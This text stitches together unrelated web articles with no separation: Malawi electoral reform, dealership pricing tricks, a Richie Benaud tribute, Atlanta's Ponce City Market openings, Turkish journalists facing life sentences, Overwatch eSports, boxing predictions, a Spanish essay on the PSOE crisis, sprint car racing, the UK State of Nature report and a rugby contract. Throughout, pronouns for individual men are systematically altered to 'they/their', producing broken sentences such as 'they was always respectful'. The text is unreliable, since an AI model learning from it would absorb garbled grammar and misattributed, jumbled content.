Catholic University of Malawi (Cunima) political scientist, Nandini Patel, said with the new system, a runoff would be made where no presidential candidate secures the threshold or a double ballot where the top two candidates contest in the second round and one who secures more votes would be declared winner.
“On the face of it, the proposal is straightforward and makes logical sense. Yet, this is complexer than it appears and if adopted it would revolutionize the way local politics is done,” said Patel.
Out of the five general elections since the transition to multiparty democracy in 1993, three candidates have made it to State House with less than 50 percent of the popular vote.
In the first post-independence multiparty elections in 1994, Bakili Muluzi won the presidency with 47 percent although later, in their second term, won with 52 percent in 1999.
In 2004, the late Bingu wa Mutharika made it with 36 percent, but their approval rating surged to 66 percent five years later in 2009. Their younger brother, Peter, in 2014 secured the presidency with about 36 percent of the votes cast.
Barely two months after Mutharika's election in 2014, several quarters especially northerners – who come from the least populated region in the country – started lodging serious calls for a federal system of government to do away with the present unitary system.
Follow and Subscribe Nyasa TV :
Price is the deciding factor in many new car purchases, so it's no surprise that dealerships do all they can to advertise the lowest number possible. While the internet has given consumers a lot of power when it comes to purchasing a new car, many consumers still fall for age-old pricing tricks.
One of the easiest ways to reel people into a dealership is to set up an advertisement for a decently optioned popular car at a sale price significantly lower than MSRP. This advertisement will usually be the lowest in the geographic area and would cause a loss for the dealership if sold. The way that deceptive dealers get around honoring the advertised price is by specifying a single stock number that qualifies and then asking a friend or relative to put a deposit on that specific vehicle as soon as the advertisement goes up online or in print.
Since the specific vehicle is technically still in dealer inventory, they can continue to advertise it. However, once a potential customer shows up, they can tell them that it is no longer available due to the pending deposit. The next step is to try and switch the customer to a similar vehicle on the lot and sell it to them at a higher price. The best way to check for this type of deceptive advertising is to offer a deposit on the vehicle before you step on the lot. If the dealer refuses to take the deposit and asks you to come in and discuss, the vehicle is most likely not available.
The website popup coupon is another practice to make the customer think they are getting a deal, but in reality only serves the dealer as a lead generation tool. In most cases, a potential customer will receive a popup while on the dealer's website offering a few hundred dollars off their purchase if they fill out their information for a coupon voucher. Once they fill out the information, it gets transferred to the dealer as a lead and generates a voucher for the potential customer. These vouchers usually have some fine print which states that it must be presented at the beginning of the transaction in order to be valid. This caveat allows the salesperson to build the savings from the voucher into the price quote so that the customer believes that they are getting a better price.
Another favorite for many dealers is to advertise a vehicle online with all incentives and rebates combined. These dealers will show a very low price but will list a disclaimer that you must qualify for all rebates and incentives and have excellent credit in order to qualify. While this may seem attainable in theory, it usually requires someone to have an odd combination of qualifications that might include being a retired veteran that graduated from college in the past six months, who insures their vehicles with USAA, and is trading in a competing vehicle on the last Tuesday of the month.
Options are another easy avenue for dealers to bring additional profit. Dealers will advertise a vehicle for a low price but will include a disclaimer that dealer installed options are not included in the price shown. Once you show up on the lot, they tell you that they will sell you that pickup for a lower price but will need to add a few charges since they have already installed a $1,000 bedliner, added $200 worth of nitrogen fill to the tires, sprayed on $400 worth of undercoating, and tinted the windows for $300. These options cost the dealer pennies on the dollar, but since they are already installed the dealer can push for you to pay the higher price once you are in front of them.
The only somewhat honest version of these advertising tactics involves the use of “loss leader” vehicles. These vehicles are usually unwanted models that are missing important features or have odd colors. These models are listed at cost or lower in order to bring customers to the lot and generate buzz. The dealer hopes that once the customer comes to the lot and sees that the vehicle has manual crank windows and is missing air conditioning that they will ask to step up to the next trim level and buy a more expensive version. The dealers will pressure you to go for the higher priced model so that they can make money, but will actually sell you the loss leader at the advertised price if you push for it.
Richie Benaud: The most influential person in cricket for the past 50 years, says Jim Maxwell
Updated
If cricket had ever anointed a pope it would be Richie Benaud.
They have been the most influential, revered and respected person in the game for 50 years. As Australian captain they never lost a series. As a commentator they were precise, authoritative and deliciously understated.
Richie was the master of the pause. Silence marked them as the best exponent of television's essential craft; let the picture tell the story, then utter appropriate gravitas, a memorably droll bon mot.
If you ran a poll today on the most popular cricket commentator in Australia, Richie would still be number one.
 They are immortalised in beige, that prominent lower lip, acute analysis and the 12th man parody recalled by the fan's refrain: two for two hundred and twenty two.
As a commentator they concentrated on the game at hand, rarely dwelt on the past, and was always respectful of the players and their foibles and failures.
A wild slog dismissal was clever bowling, a rank delivery urged a reflective comment, "might have lost their length there."
They played in an era of austerity. In their early years there were no celebrations at the fall of a wicket. It was a game. No one earned any money from playing in the Australian team.
Richie was the first tactile captain, breaking the mould of restraint with enthusiastic enjoyment of the moment.
They were one of many heroes for a young lad at the SCG who was lucky enough to see so many great New South Wales and Australian players like Richie, Neil Harvey, Alan Davidson, Norman O'Neill, Bob Simpson, Brian Booth, Bill Lawry, Graham McKenzie and Wally Grout.
Between the stellar careers of Bill O'Reilly and Shane Warne, Richie was the match-winning wrist spinner. Listening to theirs around the wicket performance at Manchester in 1961 on a crackling radio reverberates now as much Warne's ball of the century at the same ground in 1993.
I first met and interviewed Richie in 1975 for a program on the 1961 tied Test series and looking back it was a disappointment that they were never asked to work on the ABC TV coverage in those years up to the start of World Series Cricket, which transformed the presentation of the game on television.
My respect and admiration for Richie deepened in the last decade when they were twelfth man at The Primary Club. Every appearance was greeted rapturously by the audience at our various functions, and they gave an ear to all comers who wanted a moment with them at the annual Marathon Cricket matches at the SCG.
Richie was unique. A great all-rounder and leader whose devotion to the game has been phenomenal.
Topics: sport, cricket, sydney-2000, nsw, australia
First posted
…today. Monday August 25th. So you can walk hard-hat free around the property, shop Binders (who quietly opened their doors last week in our construction site!) take classes at General Assembly and drop your kids at Suzuki School in addition to grabbing your daily cup of coffee from Dancing Goats. Because they're all open or opening in the next three weeks!
Last week was a big week on the site. After three years of construction we got the necessary approvals from the city to start removing the gates and the hard hat restrictions from the overall site. Almost simultaneously, the transaction closed on the historic tax credits that have provided the resources to carefully restore the old steel sash windows, hardwood floors and maintain so many beautiful features of this historic site.
So come, meet our first batch of tenants. Our early adopters. The businesses who were game to open first. Art retailer Binders opened their doors last Wednesday and they're planning grand opening ceremony's happening in 3 weeks! Tech meet up facility General Assembly is already doing meet and greets and will be starting classes in September. Today, the 150ish parents who have enrolled their children in The Suzuki School preschool will get to mix and meet instructors that their kids will see every day starting after Labor Day. Our first tenant in the big brick building, the building's first office athenahealth will move 200 employees into the building September 22, the same day food trucks will start bringing lunch to the hungry masses each day at Ponce City Market. In October-January we'll see our first wave of residents who signed leases to the Flats as they start their move in. This new budding community of Flats residents and workers at the office will be granted exclusive access to the BeltLine from the property – the same access the public will get early next year.
But we're not done…we're already looking ahead and our team is working tirelessly to deliver the next batch of tiered openings and lease announcements in the coming months. First you'll see announcements about more food hall purveyors and retailers in the big brick building as well as the BeltLine rail shed…then more office folks move in before end of year. In spring of next year there will be a big wave of restaurants and the Central Food Hall will open its doors to the public along with the BeltLine bridge connection, the BeltLine rail shed and some retail followed by more retail throughout the rest of 2015 and lastly, the Roof at Ponce City Market. We're excited to be contributing to the fabric of the Atlanta area and building a long term community amenity. We hope you're enjoying the journey with us as we begin more retail openings in the coming year.
(ANSAmed) - ISTANBUL, JANUARY 27 - The Istanbul prosecutor has demanded life prison sentences be handed down to Can Dundar and Erdem Gul, the jailed editor-in-chief and news editor of the opposition Cumhuriyet newspaper, on charges of espionage and "terrorist propaganda" for publishing an investigative report on presumed trafficking of weapons from Turkey to Syria.
The court has to approve the prosecutor's request before the trial of the two journalists begins. After the publication of the report on the eve of June elections the journalists were denounced by the Turkish secret services and by President Recep Tayyip Erdoğan, who threatened that they would pay "a heavy price" for their reporting.
The case has fuelled protests internationally, rekindling alarm over the worsening press freedom situation in Turkey.
Dundar and Gul were arrested November 26. They then were held in solitary confinement for 40 days before being put in the same cell in Istanbul's Silivri prison.
Blizzard Entertainment are without a doubt one of the greatest giants in the games industry and it is clear that their latest baby, Overwatch, was meant for eSports greatness from the release date. The game has already had a few major appearances on the eSports scene, most notably the Overwatch World Cup at this year's Blizzcon and has been making quite a few headlines.
The question now, six months after the launch of this immensely fun game is, does Overwatch have what it takes to actually become one of the more successful eSports?
More Fun And Games
Unlike some other popular eSports like Dota 2 or Call Of Duty, Overwatch was designed with simplicity in mind. While there is a ton of strategy and skill at play, a casual player will surely learn the basics of Overwatch and start having fun with the game much faster than they would in these other games.
For a big part this is due to the loadout system which does not make the player make complex decisions right off the bat. Instead, players can simply pick a character and start playing with preset skills and weapons which never change.
The ability of the players to change their characters mid-game and quickly adapt to what the other team is doing also makes the game more fun and enjoyable and at times hectic. Hectic is good however, as it means the gameplay will be more fun for the casual players who are essential if a game is to actually be a great eSports, as such a thing cannot happen without a huge customer base.
While there are still things to improve in Overwatch, Blizzard have been patching and changing the game constantly in an effort to comply with what the fans are saying while maintaining their idea of a more fun and more relaxed eSport.
By Jake Donovan
From Mr. HBO to Mr. Showtime, it's been a wild and crazy year for unbeaten rising star Adrien Broner.
The former lightweight titlist moved up in weight, capturing a welterweight belt with a strangely scored split decision win over Paul Malignaggi in June. The bout took trash talking to new heights, but also solidified Broner's status as a ratings magnet, the only fighter in 2013 to score Top 10 TV-rated bouts on both HBO and Showtime.
The road to superstardom isn't free and clear, however. Standing in their way is bubble contender Marcos Maidana, whom they face on a loaded card at the Alamodome in San Antonio.
The power punching Argentine resurfaced on the contender stage with knockout wins over Jesus Soto Karass last September and Josesito Lopez this past June.
Social media taunts served as the primer for this matchup being made, though aggressively pursued and finalized after their ringside altercation in September during Fight Week for Floyd Mayweather's lucrative points win over Saul ‘Canelo' Alvarez.
With all of the nonsense now in the rearview mirror, all that's left to do is fight.
Who will let their fists talk the loudest once the opening bell rings? Read on to see how the staff at Boxingscene.com believes tonight's Showtime-televised main event plays out.
B-SCENE STAFF PREDICTIONS - ADRIEN BRONER vs. MARCOS MAIDANA
“Broner will dominate from the opening bell, but Maidana will hear the final bell.”
- Ryan Burton (Broner UD)
“I thought they looked good-not-great against Paulie Malignaggi in their welterweight debut. I expect them to deliver a showcase performance versus Marcos Maidana, but also reminded of the power difference between the two. Maidana's toughness is overstated, but their punching power is for real. Broner will get tagged enough to know not to get too careless, but at the same time "get down" enough to keep the crowd entertained and a steady lead on the scorecards throughout.”
- Jake Donovan (Broner UD)
“Broner... all day long. The same thing that typically happens when a good tough guy meets a high-end skills guy will happen here. The skills guy will win and look good doing it.”
- Lyle Fitzsimmons (Broner TKO10)
“While a gifted offensive fighter, Adrien Broner is flawed enough defensively to consider the heavy-handed Marcos Maidana a live underdog. We'll learn how complete of a welterweight Broner is in this fight because Maidana will test their chin, something Broner didn't need to worry about when they fought Paulie Malignaggi in their welterweight debut. If they take Maidana's power well, Broner's boxing ability.”
- Keith Idec (Broner UD)
“Adrien Broner still has yet to prove their power has carried over from the lightweight division, and they certainly have their work cut for them with a brick wall like Marcos Maidana. However, Maidana struggles with swift guys who can box, and I see Broner flustering them with their hand speed and movement the same way Devon Alexander did last year.”
- Ryan Maquinana (Broner by decision)
“Maidana will have their moments. Specifically, about 3 moments. Outside of that, it will be a Broner display of speed, power he's building into at 147, and plenty of flash.”
- Richard Najdowski (Broner UD)
“I expect Marcos Maidana to give a spirited effort and really test Adrien Broner on Saturday night. Maidana's sheer will and power make them dangerous, yet I see Broner being a little more talented and have a feeling they will be on their game. I also think Broner will have filled out a little better at 147 pounds compared to their welterweight debut against Paulie Malignaggi. I would have to pick Broner to win an entertaining decision in this one. ”
- Chris Robinson (Broner UD)
“Adrien Broner, betraying the hype, isn't the defensive wizard some think they are. They get hit in most fights, and Marcos Maidana can hit with the best of them. Unfortunately, they still get hit much more than Broner, and the fledgling porn star knows how to use their feet for space. Devon Alexander multiplied the offense on Maidana and had them looking weary. Broner has more firepower than Devon and, while Maidana may have some fun moments, Broner breaks them down before it's over.”
- Cliff Rold (Broner by KO)
“Broner hasn't proven to be a strong welterweight. Maliggnaggi showed that Broner lacks the power to settle at 147 pounds. If Maidana can break their defense, they can give us a big surprise this Saturday. Despite this, I thin Broner edges him.”
- Reynaldo Sanchez (Broner SD)
“This could be a tremendous bout between two of the best welterweights in boxing on paper. Could Broner be able to box their way to win or will they go for the KO? If they do the latter, that could play into Maidana's hands. Broner has been susceptible to getting hit in their last two fights. Maidana has gotten better at timing their opponents and cutting off the ring. I like Maidana to pull off the upset.”
- Francisco Salazar (Maidana by TKO or late stoppage)
This is a true test for Broner who's been touted as the next best thing and now it's time to prove it. Maidana's hard punching and resiliency will pose real threats to them but I see Broner winning on points over 12 rounds. They won't walk away from this unscathed and will taste Maidana's power but he'll overcome it and register the first successful defense of their title.”
- Luis Sandoval (Broner UD)
“Maidana is too tough to be stopped, and Broner isn't a puncher any more at welterweight. Yet, their sturdy chin and skills set will prove too much for the dangerous but limited Argentinean.”
- Alexey Sukachev (Broner UD)
Totals:
Adrien Broner 11
Marcos Maidana 1
Jake Donovan is the Managing Editor of Boxingscene.com, as well as a member of the Transnational Boxing Ratings Board, Yahoo Boxing Ratings Panel and the Boxing Writers Association of America. Twitter: @JakeNDaBox
---------------------------------------------------------------------------------------------------------------------------------
CTXT ha acreditado a cuatro periodistas --Raquel Agueros, Esteban Ordóñez, Willy Veleta y Rubén Juste-- en los juicios Gürtel y Black. ¿Nos ayudas a financiar este despliegue?
---------------------------------------------------------------------------------------------------------------------------------
En uno de sus más conocidos “pensamientos”, el filósofo Blaise Pascal (1623-1662) afirmaba que “si la nariz de Cleopatra hubiese sido más corta, la historia del mundo habría cambiado completamente”. Pascal se refería al famosísimo apéndice nasal de la reina ptolemaica, cifra de su belleza, como a una fuente de poder capaz de decidir batallas, romper o anudar alianzas y eventualmente determinar la relación --de independencia o vasallaje– entre Egipto y Roma. Cleopatra apoyó en su nariz la pompa de su debilitado poder real para multiplicarlo a través de César y Marco Antonio; y si perdió ante Octavio Augusto fue porque las narices, al contrario que los cañones o las bombas, no causan en todas las víctimas el mismo tipo de heridas. En todo caso, Pascal acudió a un detalle muy pequeño, instalado en un pequeño cuerpo individual, para subrayar del modo más provocativo la desproporción entre las causas y los efectos y llamar la atención sobre el hecho de que los designios divinos --o la lucha de clases-- se ven a menudo descabalados, o al menos desviados, por factores adventicios que no pueden ser directamente absorbidos en el seno de la Historia (ni en la voluntad de Dios). No son las narices las que hacen la historia, es verdad, pero se hace con ellas, y no se pueden dejar a un lado si se quiere comprender el margen de contingencia y de intervención individual que configura la esfera política.
Podríamos decir, en efecto, que la nariz pascaliana anticipa lo que el muy jansenista Gramsci llamaría tres siglos más tarde “la autonomía de lo político”, a condición de incluir en este concepto, junto a las formas y las culturas, dos factores de muy distinta naturaleza. Por un lado, sí, la mencionada “nariz de Cleopatra”; es decir, los efectos colaterales del hecho de ser --los humanos-- sujetos corporales y lingüísticos embargados por deseos socialmente combinados pero atravesados, como una espina, en las relaciones económicas y, desde luego, en los cálculos racionales y sus ambiciones de transparencia. Esta opacidad --la del tamaño y el carácter, inseparables, como recuerdan Jorge Alemán y Carlos Fernández Liria, de la sexualidad y la neurosis-- es la que ha permitido siempre hacer una lectura shakespeariana de las luchas por el poder. El “juego de tronos” que tanto fascina a algunos dirigentes podemitas es sobre todo el reconocimiento de un margen irreductible de tragedia clásica --al lado o frente a las “estructuras” y los “sistemas”-- que habría que intentar, sin embargo, gestionar, aliviar y limitar. La “nariz de Cleopatra”, obviamente, determina asimismo la condición relevante de los liderazgos individuales, sobre todo en periodos de crisis o de transición histórica (como lo fue el del paso de la República al Imperio en la antigua Roma).
Pensar mejor o peor dependerá de las instituciones que dominen nuestras vidas; y por eso es tan importante cambiarlas
Pero junto a la Nariz hay otro factor autónomo que atraviesa las relaciones de poder. Me refiero a las instituciones; al hecho --es decir-- de que los marcos institucionales no sólo imponen sus propias reglas clasificatorias y organizativas sino que, como recuerda la antropóloga Mary Douglas, los seres humanos pensamos siempre, incluso cuando más libres y solos nos sentimos, a través de ellas. Un médico piensa a través del hospital (público o privado) en el que trabaja; un mafioso piensa a través de la familia a la que ha jurado fidelidad; y un político piensa a través del aparato del partido en el que milita. Pensar mejor o peor dependerá de las instituciones que dominen nuestras vidas; y por eso es tan importante cambiarlas. Asimismo, la posibilidad de intervenir mejor o peor (para alcanzar mejores instituciones) dependerá a su vez de los partidos políticos que tengamos, siempre amenazados, de entrada, por la conocida “ley de hierro” de Michel. La “autonomía de lo político”, compuesta de narices e instituciones, reviste por eso mismo una dimensión literaria y fatalista que, al tiempo que hace apasionante y contingente el juego del poder, impone límites internos a toda esperanza de cambio radical. Sin esa “autonomía” no se podría intervenir sobre las “estructuras”, pero esa autonomía dificulta, más que facilita, la intervención.
To-do esto para decir que, si lo decisivo en la crisis del PSOE es sin duda la crisis del régimen, no podemos entender sus peripecias sin introducir, más allá del Ibex, la nariz de Pedro Sánchez y el fatalismo institucional del Partido Socialista. Es la combinación de esos dos factores la que ha llevado a ese colofón teatral, el sábado pasado, cuya radical tragedia se agudizaba tanto más en la medida en que adoptaba la forma irreprimible de un sainete esperpéntico (del que se avergonzaban los propios actores). La evidencia que delataba la descomposición entrópica del PSOE el pasado sábado, en la reunión del Comité Federal en Ferraz, era justamente el hecho de que, a partir de cierto momento, ninguno de sus participantes, como ocurre en Homero y en Shakespeare, era ya dueño de sí mismo. Eran to-dos juguetes del destino. De hecho, para adueñarse del destino, los llamados “críticos” tuvieron que aceptarlo y precipitarlo (el destino), igual que en la historia de la muerte en Samarkanda, y reintroducir la “seriedad” que desdramatizaba la escena al coste de consumar violentamente la tragedia.
Es difícil que el PSOE se recupere de esa puesta en escena a la que estaba abocado desde hace dos años. ¿Por qué abocado? De un lado teníamos a un Pedro Sánchez de flato y plástico que, empujado desde dentro por Susana Díaz y la vieja guardia del partido, encabritado desde fuera por Podemos, había ido creyéndose poco a poco su “misión histórica” de mártir numantino del cambio. Es lo que el citado Pascal llamaba la máquina; lo que comenzó como una simple estrategia de supervivencia personal en condiciones extremas acabó --a fuerza de repetir ciertos gestos y ciertas palabras-- apoderándose de su imaginación. Da toda la impresión de que Sańchez, siempre vacío, era sincero; y de que, hasta bien avanzada la jornada del sábado, se creyó paladín insobornable de la “nueva política” enfrentado a los poderes más oscuros de la tierra.
Una de las características de las instituciones, y sobre todo de los partidos políticos, es el hecho de que, cuando pensamos a través de ellos, nos parece estar pensando los límites del mundo
Del otro lado estaba la “institución” --el partido-- que “pensaba” a través de todos sus miembros con las reglas que se habían normalizado desde Suresnes y que, como lo probaba el propio espectáculo del Comité Federal, impedían ver el exterior o, al menos, introducirlo en la sala. Una de las características de las instituciones, y sobre todo de los partidos políticos, es el hecho de que, cuando pensamos a través de ellos, nos parece estar pensando los límites del mundo. Este ensimismamiento --o visceración-- institucional es más profundo allí donde la jerarquía y la opacidad son mayores; y donde la disciplina a la hora de aceptar estas reglas trapaceras se da por sentada. La “nariz” de Pedro Sánchez, como la del cuento de Gógol, se emancipó del cuerpo del partido, aunque se mantuvo atada a él por un hilo del que enseguida hablaremos. Sánchez tuvo narices para desobedecer, pero no para desobedecer del to-do. Y este pulso --entre la nariz y la institución-- había llegado tan lejos que, cuando comenzó la reunión del Comité Federal, to-dos sabíamos --lo sabían incluso los propios actores-- que sus miembros se habían reunido para clavarse cuchillos en la espalda delante de toda España.
El gran talento teatral de Pedro Sánchez ha sido el de ceder en el último momento y de la manera en que más daño podía hacer al PSOE, ya muy magullado. ¿Por qué? Esto tiene que ver sin duda con el marco en el que se combinaban las dos “autonomías”, la de la nariz de Sánchez y la de la institución llamada PSOE. Ese marco es, como han señalado algunos brillantes análisis, la crisis del régimen, que se hizo visible con el 15M y se materializó política e institucionalmente con la irrupción de Podemos. Al quebrarse, el bipartidismo, por así decirlo, se desdobló, segregando dos vástagos paralelos, pero es obvio que al PSOE, verdadero pilar del orden establecido, le tocó bailar con la más fea. Mientras el PP se ha disputado el terreno con C's, que había nacido como su muleta y en el que, llegado el momento, se ha podido apoyar, el PSOE ha tenido que lidiar con Podemos, fuerza nacida fuera del sistema y que, en la medida en que amenazaba su existencia, la “institución” socialista sólo podía odiar. Es este odio a Podemos, y la batalla que ha librado contra la fuerza morada, la que ha consumido la vida del partido los dos últimos años, hasta el punto de que en las dos últimas elecciones generales el PSOE ya no se medía con el PP ni aspiraba a ganar los comicios; el resto de legitimidad que conservaba Sánchez tenía que ver con el hecho de que había conseguido evitar el sorpasso. El ex secretario general, por tanto, mientras se iba creyendo paladín del cambio y se enfrentaba a los barones de su partido, mientras metía su nariz en los entresijos del aparato, seguía “pensando” desde él, obsesionado como todos con Podemos y Pablo Iglesias y decidido, por tanto, a no hacer ninguna concesión en esa dirección. Encerrado en esos límites --los que imponía la existencia de Podemos-- el pulso entre la nariz de Sánchez y la institución llamada PSOE sólo podía prolongarse agónicamente, en un bucle teatral completamente paralelo a la realidad, como así sucedió, y sólo podía ser interrumpido por un golpe de Estado que empeorase aún más las cosas. Así ha sucedido también. Tragedia shakespeariana y fatalismo institucional se han dado cita, una vez más, para cambiar la historia.
La sinceridad de Sánchez se ha revelado finalmente necia y suicida. La decisión de pelear hacia dentro sin hacer ninguna concesión hacia fuera para ceder en el último momento a un golpe que él mismo acabó justificando ha acelerado el final del PSOE, ya en descomposición, dañando al mismo tiempo las opciones reales de cambio, al menos a corto plazo. Inútil para la restauración, inútil contra la restauración, el PSOE ha quedado --no diremos definitivamente-- fuera de juego. Sería una buena noticia si la “nariz” de Pedro Sánchez, además de alimentar las dinámicas entrópicas de su partido, no hubiera aupado al PP y, para felicidad del Ibex, retrasado las transformaciones que reclama nuestro país en una Europa en la que la justicia y la democracia no van ganando. Y si Podemos fuera --o volviera a ser-- una fuerza capaz de representar realmente a esa mayoría social desarmada por la crisis y cansada de nuevo de la política y de los políticos...
Central Pennsylvania Sprint Car fans and drivers are pumped full of excitement and anticipation at this time of year.
It's all about Pennsylvania Posse pride.
There is reason for a little chest pumping. The locals have, traditionally, had the toughest weekly programs in the country and can run stride-for-stride and contend for wins against the World of Outlaws STP Sprint Car Series.
Since 2008, the Posse contingent — Daryn Pittman and Cody Darrah earned WoO wins while running locally — has raced even with the traveling band, claiming 15 of 30 shows at Williams Grove Speedway.
The locals have dominated at Lincoln. Danny Dietrich won two straight WoO events, while fringe Posse member Stevie Smith won in May of this year.
Daryn Pittman gained some redemption at the Grove earlier this year, sweeping a two-day show. And after watching the Outlaw contingent through the first half of the season, it's time for the group to tip the scale.
With a three-race sweep.
No need for a double take. The World of Outlaws will come into central Pennsylvania this week and not only earn a Lincoln victory but also orchestrate another Williams Grove beat down at the historic half mile.
The Outlaws are just too fast, too good. They seem to have a good package in the second year of the Hoosier Tire Deal and more important, have more guys running the circuit that can book a trip to Victory Lane.
Donny Schatz, our pick in Saturday's Summer Nationals, needs no introduction to Posse fans.  They are the best Sprint Car driver on the planet and owns 18 tallies at Williams Grove. They have also been quick at Lincoln at times and is a handful during the summer months.
Pittman is just as good as Schatz in the area.  They are used to the tricky central Pennsylvania tracks after driving in the Keystone State four seasons, and that experience paid off last season with consistent finishes and in May. They will add a Lincoln win to their resume Thursday.
If it was just the Schatz-Pittman show, the locals would have a chance. But guys like Kerry Madsen — they have nine top-five finishes in the last 10 features — Paul McMahan and David Gravel time well and are finding success.
Then you have Joey Saldana and Brad Sweet. Both drivers struggle once they hit the Pennsylvania line, but you can never count out these two talents.
I would also be remiss if I didn't mention Steve Kinser.  They are having another sub-par season, but they do own 38 victories at Williams Grove and you never know when they are going to put together that last great ride.
This isn't an indictment of the locals. Hey, Greg Hodnett and Lance Dewease know how to win. Danny Dietrich and Brian Montieth have talent. And no one in the area is as fast as Lucas Wolfe and Stevie Smith.
It's more about the World of Outlaws being faster. As a group, they are on top of their game and this is the time of year when they shine.
There is this misconception that the World of Outlaws teams just outspend the competition. They open up the wallet, and speed falls out.
Not true. Not even close.
Sure, these teams are well funded. But the reason they are good is because these drivers can adapt, they can overcome. And they work hard, which should be respected by every fan that has ever bought a ticket.
This isn't a knock on the locals. They are a strong group. But the Outlaws do it for a living, 24-7, 365 days a year.
Look for those factors to pay off this week. And for the Outlaws to storm into central Pennsylvania and take the loot out of town.
NOTES
-According to Sammy Swindell, their team will drop off the World of Outlaws tour for two weekends and compete at Knoxville Raceway. The move is being made to prepare for this year's Knoxville Nationals. Swindell failed to make last year's A-Main at the Nationals and car-owner Tod Quiring has never won the race.
-Steve Kinser will make an appearance at Golf Cart Services open house today from 11 a.m. to 1 p.m. Kinser's car will be in attendance, and The King of the Outlaws will sign autographs and talk to fans that attend. Golf Cart Services is at 4296 York Road, New Oxford, Pa, 17350.
-John Westbrook is suing Williams Grove Speedway for negligence in relation to an accident on Sept. 5, 2008 that left the former Sprint Car driver a quadriplegic. The trial started Monday. Westbrook took the stand Wednesday, and the prosecution rested its case. The defense will cross-examine Westbrook Thursday and present its case.
-Brent Marks became one of 156 drivers to compete in a Kings Royal event. The Myerstown driver, who was making their first Kings Royal appearance, qualified second in their heat race and finished 19th in the 40-lap A-Main. It should be noted that Marks ran the final two thirds of the event with a broken piece on their top wing.
Image copyright MikeLane45 Image caption Skylark numbers have fallen by 60% since the 1970s
More than 50 conservation groups say the "policy-driven" intensification of farming is a significant driver of nature loss in the UK.
The State of Nature report assessed 8,000 UK species and found that one in 10 are threatened with extinction.
More than half of farmland birds (56%) including the turtle dove and corn bunting are in danger of extinction.
The National Farmers Union said the report ignored progress made by farmers on conservation in the last 25 years.
Mark Eaton is the lead author of the paper. They said: "We now know that farming practices over recent decades have had the single largest impact on the UK's wildlife.
"The great majority of that impact has been negative. This isn't deliberate, it is a by-product of changes in farming to make it more efficient."
'Squeezed out'
"There have been big changes in farming which has made it much more efficient. This is great for putting food on the table. But nature has been squeezed out. Our research for the first time has quantified that."
Farmland makes up three quarters of the UK's landscape. The report assessed the risk of extinction for 1,118 farmland species. Of 26 bird species almost half (46%) are in danger of going extinct including the corn bunting and the turtle dove and their numbers are still declining. Skylark numbers are down 60% since 1970.
Plants, insects and butterflies have also suffered, with the abundance of butterfly species such as the high brown fritillary having diminished by 57% since 1990.
Image copyright ErikKarits
Some 12% of farmland species are now on the Red List, including plants such as the Shepherd-needle and corn marigolds.
Mr Eaton pointed to the increasing use of pesticides and herbicides, increased fertiliser use, the loss of hedgerows from farms and changing farming practices.
Crops are now mostly sown in autumn instead of spring, and this has had a negative impact on some birds, although it has been good for other species, such as the woodpigeon.
"A lot of these things we can't go back on. Autumn-sowing is much better for farmers, so we can't expect them to change tack. But we need to find a way within these new systems - finding the tweaks that will let nature back in. We don't want to go back to Constable country, we know it's not possible."
"We do know that farming and nature can co-exist. There are agri-environment schemes - farmers can farm in environmentally friendly ways. So we can do both."
National Farmers Union (NFU) vice-president Guy Smith said: "As the report acknowledges, agricultural policies of the past did focus on maximising food production, resulting in the intensification of farming in the years after World War II.
'Demand for food'
"However, since the early 1990s, in terms of inputs and in terms of numbers of livestock and area of crops grown British agriculture has not intensified - in fact it's the reverse. Therefore it makes little sense to attribute cause and effect to 'the intensification of agriculture' in the UK in the last quarter of a century when there hasn't been any.
"Other causes acknowledged in the report, such as urbanisation, climate change or increasing predator pressure need greater attention."
The NFU says that farmers have planted or restored 30,000km of hedgerows, and given over the borders of their fields to plant wildflowers for birds and bees. It adds that it is "using less fertiliser and pesticides than ever".
Mr Smith also pointed out the fundamental need for farmers to produce food. "There is now a high degree of academic consensus that the world will also need to increase food production significantly to meet the needs of a growing population.
"This increased demand for food will have to be met using finite agricultural land, while our climate continues to change, which will inevitably place further constraints on production in many parts of the world."
Image copyright nico_65
Attenborough: 'Our nature is in serious trouble'
In a foreword to the report, Sir David Attenborough said: "Escalating pressures such as climate change and modern land management mean we continue to lose the precious wildlife that enriches our lives and is essential to the health and well-being of those who live in the UK, and also its Crown Dependencies and Overseas Territories. Our wonderful nature is in serious trouble and needs our help as never before."
Among the 50 conservation and research organisations that have contributed to the report are the National Trust, Buglife, Wildlife Trusts and the RSPB. It was the last State of Nature report in 2013 that highlighted the dramatic loss in wildlife from the countryside: turtle dove numbers having fallen by over 90% since 1970, and hedgehog numbers declining by a third since the turn of the century. Three years later, the picture is almost as bleak. The report states: "There was no statistical difference - no change in the proportion of species threatened with extinction."
The State of Nature report does not go into detail on the EU subsidy system, but blames the current damage being done to nature on "policy-driven" intensification.
Fiona Mathews, chair of the Mammal Society and associate professor at the University of Exeter, and an author of the report, said: "The reality is that our human population is expanding and we need urgently to work out how we can live alongside our wildlife."
Matt Shardlow, chief executive of BugLife, said: "Government investment in wildlife conservation has dropped by a third in the last six years. This makes it even more crucial that the wishes of the public are respected and Brexit results in the maintenance of current wildlife protection and the introduction of new environmental framework legislation that will set the foundation for reversing wildlife loss."
'Broken' system
The National Trust, one of the charities involved in this report, believes that Brexit provides an opportunity to reform the current "broken" system. Subsidies should be maintained but wildlife and the environment should be put at the centre of how this public money should be handed out.
Tim Breitmeyer, from the Countryside Land and Business Association, said: "As we start to develop policy for a UK outside of the EU, it is critical that a proper understanding is established between farmers and environmental groups. As landowners, our starting point is clear: only a profitable, resilient farming sector can realistically invest time and resource in environmental management."
Marine plant species and also some vertebrates such as small fish are faring slightly better. Almost 70% of the species surveyed are increasing in number. However, marine invertebrates such as plankton are suffering - with 75% of species declining.
The report also highlighted the "many inspiring examples of conservation action that is helping to turn the tide", such as restoration and reintroduction projects.
The authors also assessed British species found in woods, moors and mountains and in freshwater and marine environments.
Follow Claire on Twitter.
Harlequins have confirmed that Joe Marchant, one of the club's most exciting prospects, has extended their contract.
Confirming the news Harlequins Director of Rugby, John Kingston, said: “Joe is an exceptional young talent who had a fantastic first full season in the Premiership last year.
“I am certain that many aspiring English clubs would have loved to secure their services and therefore it is a real statement of intent that we have finalised a lengthy contract extension with him.
“He is another player who has come through our highly acclaimed Academy and in the discussions had, they made it very clear how much they loved the club and that they see themselves playing for Harlequins for many years to come.”
Joining the Harlequins Academy in 2014 after captaining both the England and Harlequins U18s teams, they were soon called into the England U20s squad. After winning the 2015 U20 Six Nations, Marchant was then part of the England side that won the Junior World Cup in 2016 on home soil.
Making their Harlequins debut at Kingston Park in May 2015, the centre has since made 37 appearances for the club, scoring 11 tries.
